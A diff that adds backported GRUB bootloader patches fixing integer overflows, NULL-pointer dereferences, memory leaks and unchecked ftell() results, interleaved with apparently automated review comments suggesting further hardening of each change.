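+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/fbfill.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
+index 11816d0..a37acd1 100644
+--- a/grub-core/video/fb/fbfill.c
++++ b/grub-core/video/fb/fbfill.c
+@@ -31,6 +31,7 @@
+ #include <grub/fbfill.h>
+ #include <grub/fbutil.h>
+ #include <grub/types.h>
++#include <grub/safemath.h>
+ #include <grub/video.h>
+
+ /* Generic filler that works for every supported mode. */
+@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
+ #endif
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);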
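Review bot: All four fillers now return silently when `grub_mul()` or `grub_sub()` reports overflow, so an inconsistent pitch/width combination shows up only as a rectangle that is never drawn. Since the functions are void, a comment at the check would at least record the intent, e.g. `/* Inconsistent mode geometry: skip the fill rather than write out of bounds. */`. The identical three-line check is repeated in direct32, direct24, direct16 and direct8 and could live in one static helper. The declaration of `rowskip` is outside the hunks, so it is worth confirming that its type is the width the overflow check is meant to enforce.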
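--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
+From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 14:43:44 +0000
+Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
+
+The calculation of the unsigned 64-bit value is being generated by
+multiplying 2, signed or unsigned, 32-bit integers which may overflow
+before promotion to unsigned 64-bit. Fix all of them.
+
+Fixes: CID 73703, CID 73767, CID 73833
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
+ 1 file changed, 36 insertions(+), 16 deletions(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1a602c8..1c9a138 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -25,6 +25,7 @@
+ #include <grub/fbutil.h>
+ #include <grub/bitmap.h>
+ #include <grub/dl.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
+ {
+ if (framebuffer.current_dirty.first_line
+ <= framebuffer.current_dirty.last_line)
+- grub_memcpy ((char *) framebuffer.pages[0]
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (framebuffer.current_dirty.last_line
+- - framebuffer.current_dirty.first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (framebuffer.current_dirty.last_line,
++ framebuffer.current_dirty.first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
+ framebuffer.current_dirty.last_line = 0;
+@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
+ volatile void *framebuf)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info.pitch * mode_info.height;
++ grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
+
+ framebuffer.offscreen_buffer = grub_zalloc (page_size);
+ if (! framebuffer.offscreen_buffer)
+@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
+ last_line = framebuffer.previous_dirty.last_line;
+
+ if (first_line <= last_line)
+- grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (last_line - first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (last_line, first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
++
+ framebuffer.previous_dirty = framebuffer.current_dirty;
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;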
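Review bot: In both update_screen functions only the copy length goes through `grub_sub()`/`grub_mul()`; the source and destination offsets passed to `grub_memcpy()` are still plain `first_line * ...mode_info.pitch` products, the same kind of multiplication the patch treats as overflow-prone. Computing the offset once with `grub_mul()` into a `grub_size_t` and adding it to both base pointers would cover the addresses as well as the length. In grub_video_fb_doublebuf_blit_init the `(grub_size_t)` cast only helps where `grub_size_t` is wider than the operands; `grub_mul (mode_info.pitch, mode_info.height, &page_size)` would be checked regardless of the target's word size.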
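--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
+From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 14:51:30 +0000
+Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
+
+It is minimal possibility that the values being used here will overflow.
+So, change the code to use the safemath function grub_mul() to ensure
+that doesn't happen.
+
+Fixes: CID 73761
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1c9a138..ae6b89f 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
+ volatile void *page1_ptr)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info->pitch * mode_info->height;
++ grub_size_t page_size = 0;
++
++ if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
+
+ framebuffer.offscreen_buffer = grub_malloc (page_size);
+ if (! framebuffer.offscreen_buffer)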
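Review bot: The overflow branch returns a bare `GRUB_ERR_BUG` without going through `grub_error()`, so no message is recorded for whoever reports the failure; other error returns on this page use the `return grub_error (CODE, "...")` form. Something like `return grub_error (GRUB_ERR_BUG, "overflow computing page size");` would be consistent, assuming the callers of doublebuf_pageflipping_init report grub_errno, which is not visible here. The function body continues outside the hunk.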
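--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
+From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:39:00 +0000
+Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
+ from a jpeg file
+
+While it may never happen, and potentially could be caught at the end of
+the function, it is worth checking up front for a bad reference to the
+next marker just in case of a maliciously crafted file being provided.
+
+Fixes: CID 73694
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/readers/jpeg.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..0b6ce3c 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
+ next_marker = data->file->offset;
+ next_marker += grub_jpeg_get_word (data);
+
++ if (next_marker > data->file->size)
++ {
++ /* Should never be set beyond the size of the file. */
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
++ }
++
+ while (data->file->offset + sizeof (data->quan_table[id]) + 1
+ <= next_marker)
+ {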
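Review bot: The added check bounds `next_marker` from above only. The value is the offset taken before the length word plus the word itself, so a length smaller than the bytes already consumed leaves `next_marker` behind `data->file->offset`; the commit message says a check at the end of the function may catch that, but that code is outside the hunk. Rejecting it in the same place would make the validation complete, e.g. `if (next_marker > data->file->size || next_marker < data->file->offset)`. The other marker decoders in jpeg.c presumably derive `next_marker` the same way and would want the same guard.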
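--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
+From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Mon, 7 Dec 2020 14:44:47 +0000
+Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
+ dead
+
+The test of value for NULL before calling grub_strdup() is not required,
+since the if condition prior to this has already tested for value being
+NULL and cannot reach this code if it is.
+
+Fixes: CID 73659
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gfxmenu/gui_list.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
+index 01477cd..df334a6 100644
+--- a/grub-core/gfxmenu/gui_list.c
++++ b/grub-core/gfxmenu/gui_list.c
+@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
+ {
+ self->need_to_recreate_boxes = 1;
+ grub_free (self->selected_item_box_pattern);
+- self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
++ self->selected_item_box_pattern = grub_strdup (value);
+ self->selected_item_box_pattern_inherit = 0;
+ }
+ }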
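Review bot: Dropping the `value ?` guard makes this assignment depend on a NULL test that sits above the hunk, and nothing next to the call says so. A one-line comment such as `/* value was checked for NULL above. */` would keep a later reordering of the branches from handing a NULL argument to `grub_strdup()`. The result of `grub_strdup()` is stored unchecked, so an allocation failure leaves the pattern NULL with `need_to_recreate_boxes` set; how that state is handled is outside the hunk.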
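--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
+From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:47:13 +0000
+Subject: [PATCH] loader/bsd: Check for NULL arg up-front
+
+The code in the next block suggests that it is possible for .set to be
+true but .arg may still be NULL.
+
+This code assumes that it is never NULL, yet later is testing if it is
+NULL - that is inconsistent.
+
+So we should check first if .arg is not NULL, and remove this check that
+is being flagged by Coverity since it is no longer required.
+
+Fixes: CID 292471
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/i386/bsd.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
+index b92cbe9..8432283 100644
+--- a/grub-core/loader/i386/bsd.c
++++ b/grub-core/loader/i386/bsd.c
+@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ kernel_type = KERNEL_TYPE_OPENBSD;
+ bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
+
+- if (ctxt->state[OPENBSD_ROOT_ARG].set)
++ if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
+ {
+ const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
+ unsigned type, unit, part;
+@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ "unknown disk type name");
+
+ unit = grub_strtoul (arg, (char **) &arg, 10);
+- if (! (arg && *arg >= 'a' && *arg <= 'z'))
++ if (! (*arg >= 'a' && *arg <= 'z'))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT,
+ "only device specifications of form "
+ "<type><number><lowercase letter> are supported");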
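Review bot: With `.arg != NULL` folded into the outer condition, a root option that is set but carries no argument now skips the whole block without any error, so the command carries on as if the option had not been given. If that state can occur, as the commit message suggests, reporting it would be safer than ignoring it, for example an `else if (ctxt->state[OPENBSD_ROOT_ARG].set)` branch that returns `grub_error (GRUB_ERR_BAD_ARGUMENT, ...)`. The end of the block and the code that follows it are outside the hunks.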
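--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
+From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:53:10 +0000
+Subject: [PATCH] loader/xnu: Fix memory leak
+
+The code here is finished with the memory stored in name, but it only
+frees it if there curvalue is valid, while it could actually free it
+regardless.
+
+The fix is a simple relocation of the grub_free() to before the test
+of curvalue.
+
+Fixes: CID 96646
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 07232d2..b3029a8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
+ name[len] = 0;
+
+ curvalue = grub_xnu_create_value (curkey, name);
++ grub_free (name);
+ if (!curvalue)
+ return grub_errno;
+- grub_free (name);
+
+ data = grub_malloc (grub_strlen (var->value) + 1);
+ if (!data)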
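--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
+From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 30 Nov 2020 12:18:24 -0300
+Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
+ grub_xnu_writetree_toheap()
+
+... to avoid memory leaks.
+
+Fixes: CID 96640
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
+ 1 file changed, 20 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index b3029a8..39ceff8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ if (! memorymap)
+ return grub_errno;
+
+- driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
++ driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
+ if (! driverkey)
+ return grub_errno;
+ driverkey->name = grub_strdup ("DeviceTree");
+ if (! driverkey->name)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
++
+ driverkey->datasize = sizeof (*extdesc);
+ driverkey->next = memorymap->first_child;
+ memorymap->first_child = driverkey;
+ driverkey->data = extdesc
+ = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
+ if (! driverkey->data)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
+
+ /* Allocate the space based on the size with dummy value. */
+ *size = grub_xnu_writetree_get_size (grub_xnu_devtree_root, "/");
+ err = grub_xnu_heap_malloc (ALIGN_UP (*size + 1, GRUB_XNU_PAGESIZE),
+ &src, target);
+ if (err)
+- return err;
++ goto fail;
+
+ /* Put real data in the dummy. */
+ extdesc->addr = *target;
+@@ -252,6 +259,15 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ /* Write the tree to heap. */
+ grub_xnu_writetree_toheap_real (src, grub_xnu_devtree_root, "/");
+ return GRUB_ERR_NONE;
++
++ fail:
++ memorymap->first_child = NULL;
++
++ grub_free (driverkey->data);
++ grub_free (driverkey->name);
++ grub_free (driverkey);
++
++ return err;
+ }
+
+ /* Find a key or value in parent key. */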
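Review bot: The `fail:` path sets `memorymap->first_child = NULL` unconditionally, but the success path links the new key with `driverkey->next = memorymap->first_child`, so if the memory-map key already had children they are dropped from the list on failure; on the first `goto fail` (name allocation) the new key had not even been linked yet. Undoing only what was done would avoid that: `if (memorymap->first_child == driverkey) memorymap->first_child = driverkey->next;`. The switch to `grub_zalloc()` is what makes freeing `driverkey->data` and `driverkey->name` safe on the early paths, which deserves a short comment at the allocation.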
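--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch
@@ -0,0 +1,42 @@
+From 778a3fffd19229e5650a1abfb06c974949991cd4 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 30 Nov 2020 10:36:00 -0300
+Subject: [PATCH] loader/xnu: Check if pointer is NULL before using it
+
+Fixes: CID 73654
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7c8a2b5d1421a0f2a33d33531f7561f3da93b844]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 39ceff8..adc048c 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -667,6 +667,9 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ char *name, *nameend;
+ int namelen;
+
++ if (infoplistname == NULL)
++ return grub_error (GRUB_ERR_BAD_FILENAME, N_("missing p-list filename"));
++
+ name = get_name_ptr (infoplistname);
+ nameend = grub_strchr (name, '/');
+
+@@ -698,10 +701,7 @@ grub_xnu_load_driver (char *infoplistname, grub_file_t binaryfile,
+ else
+ macho = 0;
+
+- if (infoplistname)
+- infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+- else
+- infoplist = 0;
++ infoplist = grub_file_open (infoplistname, GRUB_FILE_TYPE_XNU_INFO_PLIST);
+ grub_errno = GRUB_ERR_NONE;
+ if (infoplist)
+ {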
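Review bot: The early return added at the top of grub_xnu_load_driver turns a NULL `infoplistname` into an error, whereas the branch removed in the second hunk shows the function used to tolerate NULL at the grub_file_open() call and simply leave `infoplist` at 0. If any caller passes NULL to mean "no Info.plist" (the callers are outside this patch), that call now fails with GRUB_ERR_BAD_FILENAME instead of loading the binary alone, so the call sites are worth checking before the backport ships. A one-line comment above the check would record the new contract, e.g. `/* infoplistname is required from here on; it is passed to get_name_ptr () unchecked. */`. The body of grub_xnu_load_driver starts and ends outside both hunks.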
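--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch
@@ -0,0 +1,41 @@
+From 5d2dd0052474a882a22e47cc8c3ed87a01819f6b Mon Sep 17 00:00:00 2001
+From: Daniel Kiper <daniel.kiper@oracle.com>
+Date: Thu, 25 Feb 2021 18:35:01 +0100
+Subject: [PATCH] util/grub-install: Fix NULL pointer dereferences
+
+Two grub_device_open() calls does not have associated NULL checks
+for returned values. Fix that and appease the Coverity.
+
+Fixes: CID 314583
+
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b3a95655b4391122e7b0315d8cc6f876caf8183]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-install.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/util/grub-install.c b/util/grub-install.c
+index a82725f..367350f 100644
+--- a/util/grub-install.c
++++ b/util/grub-install.c
+@@ -1775,6 +1775,8 @@ main (int argc, char *argv[])
+ fill_core_services (core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, core_services, 0);
+
+@@ -1875,6 +1877,8 @@ main (int argc, char *argv[])
+ fill_core_services(core_services);
+
+ ins_dev = grub_device_open (install_drive);
++ if (ins_dev == NULL)
++ grub_util_error ("%s", grub_errmsg);
+
+ bless (ins_dev, boot_efi, 1);
+ if (!removable && update_nvram)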
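--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch
@@ -0,0 +1,46 @@
+From 3d68daf2567aace4b52bd238cfd4a8111af3bc04 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 14:33:50 +0000
+Subject: [PATCH] util/grub-editenv: Fix incorrect casting of a signed value
+
+The return value of ftell() may be negative (-1) on error. While it is
+probably unlikely to occur, we should not blindly cast to an unsigned
+value without first testing that it is not negative.
+
+Fixes: CID 73856
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5dc41edc4eba259c6043ae7698c245ec1baaacc6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/grub-editenv.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-editenv.c b/util/grub-editenv.c
+index f3662c9..db6f187 100644
+--- a/util/grub-editenv.c
++++ b/util/grub-editenv.c
+@@ -125,6 +125,7 @@ open_envblk_file (const char *name)
+ {
+ FILE *fp;
+ char *buf;
++ long loc;
+ size_t size;
+ grub_envblk_t envblk;
+
+@@ -143,7 +144,12 @@ open_envblk_file (const char *name)
+ grub_util_error (_("cannot seek `%s': %s"), name,
+ strerror (errno));
+
+- size = (size_t) ftell (fp);
++ loc = ftell (fp);
++ if (loc < 0)
++ grub_util_error (_("cannot get file location `%s': %s"), name,
++ strerror (errno));
++
++ size = (size_t) loc;
+
+ if (fseek (fp, 0, SEEK_SET) < 0)
+ grub_util_error (_("cannot seek `%s': %s"), name,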
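--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch
@@ -0,0 +1,50 @@
+From e301a0f38a2130eb80f346c31e43bf5089af583c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:04:28 +0000
+Subject: [PATCH] util/glue-efi: Fix incorrect use of a possibly negative value
+
+It is possible for the ftell() function to return a negative value,
+although it is fairly unlikely here, we should be checking for
+a negative value before we assign it to an unsigned value.
+
+Fixes: CID 73744
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=1641d74e16f9d1ca35ba1a87ee4a0bf3afa48e72]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ util/glue-efi.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/util/glue-efi.c b/util/glue-efi.c
+index 68f5316..de0fa6d 100644
+--- a/util/glue-efi.c
++++ b/util/glue-efi.c
+@@ -39,13 +39,23 @@ write_fat (FILE *in32, FILE *in64, FILE *out, const char *out_filename,
+ struct grub_macho_fat_header head;
+ struct grub_macho_fat_arch arch32, arch64;
+ grub_uint32_t size32, size64;
++ long size;
+ char *buf;
+
+ fseek (in32, 0, SEEK_END);
+- size32 = ftell (in32);
++ size = ftell (in32);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name32, strerror (errno));
++ size32 = (grub_uint32_t) size;
+ fseek (in32, 0, SEEK_SET);
++
+ fseek (in64, 0, SEEK_END);
+- size64 = ftell (in64);
++ size = ftell (in64);
++ if (size < 0)
++ grub_util_error ("cannot get end of input file '%s': %s",
++ name64, strerror (errno));
++ size64 = (grub_uint64_t) size;
+ fseek (in64, 0, SEEK_SET);
+
+ head.magic = grub_cpu_to_le32_compile_time (GRUB_MACHO_FAT_EFI_MAGIC);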
